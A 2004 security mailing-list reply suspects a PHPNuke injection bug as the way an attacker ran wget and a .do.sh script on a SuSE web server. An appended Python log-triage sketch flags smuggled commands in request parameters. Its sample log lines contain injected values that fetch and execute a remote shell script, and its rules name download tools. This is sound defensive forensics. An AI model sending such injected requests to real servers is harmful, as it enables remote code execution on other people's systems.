
Re: [suse-security] Backdoor over http(s)??



Hi Mátyás,

On Tue, 13.01.2004 at 17:33, Mátyás Tibor wrote:
> I have got in /cgi-bin/ directory:
> 
> -neomail (1.26)
> -openwebmail (2.30)
> -SuSE things
> -sanecgi
> 
> but nothing else.
> 
> And I have Phpnuke 6.9 (?? PHP ??)

Did you check PHPNuke? I wouldn't trust this piece of software further
than I can throw my Gateway bigtower case ;-)

PostNuke and PHPNuke are known to be notoriously weak when it comes to
security.

> -----
> Ok, somebody could use wget, but what about the .do.sh -->
> how was it possible, to execute it?

Without knowing anything else I'd suspect PHPNuke to be the open door.
It may contain a bug that allows passing executable content as a
parameter. This has been the case in the past very often as the
developers of those two projects don't seem to be too concerned about
evaluating the parameters at runtime.

Have a look at this:

http://www.gulftech.org/01032004.php

or

http://www.securitytracker.com/alerts/2003/Dec/1008562.html

I really wouldn't use PostNuke or PHPNuke as there never has been any
code audit seemingly since new weaknesses based on poor programming are
discovered regularly.

just my 0.02 euro ;-)

Tobias
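
A log triage sketch for the question raised in this thread (how a wget and the `.do.sh` could have been run over HTTP), added here as an example and not part of Tobias's mail: it scans Apache access-log lines for query parameters whose decoded value carries a shell command. The script path, parameter name, addresses, timestamps and log lines are constructed, and the rule set is an assumption, not a complete signature list.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Markers of a command smuggled into a parameter value: a download tool,
# a shell script name, or shell metacharacters that chain commands.
RULES = {
    "download-tool": re.compile(r'\b(wget|curl|lynx|fetch)\b', re.I),
    "shell-script": re.compile(r'(^|[\s/;|&])\.?[\w-]+\.sh\b', re.I),
    "shell-metachar": re.compile(r'[;|`]|\$\(|&&'),
}

# Constructed sample lines (not taken from the affected host).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2004:16:58:01 +0100] "GET /index.php?name=News&sid=12 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [13/Jan/2004:17:02:44 +0100] "GET /app.php?page=x%3Bwget%20http%3A%2F%2Fhost.invalid%2F.do.sh HTTP/1.0" 200 312',
    '198.51.100.7 - - [13/Jan/2004:17:02:51 +0100] "GET /app.php?page=x%253Bsh%2520.do.sh HTTP/1.0" 200 0',
]

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (%253B -> %3B -> ;), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client, time, path, parameter, matched rules) for each flagged parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, when, _method, target, _status = m.groups()
        url = urlsplit(target)
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = decode_fully(raw)
            matched = sorted(r for r, rx in RULES.items() if rx.search(value))
            if matched:
                hits.append((client, when, url.path, name, matched))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Only GET query strings show up in the access log; a command passed in a POST body or a cookie leaves no trace there, so an empty result does not clear the application.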

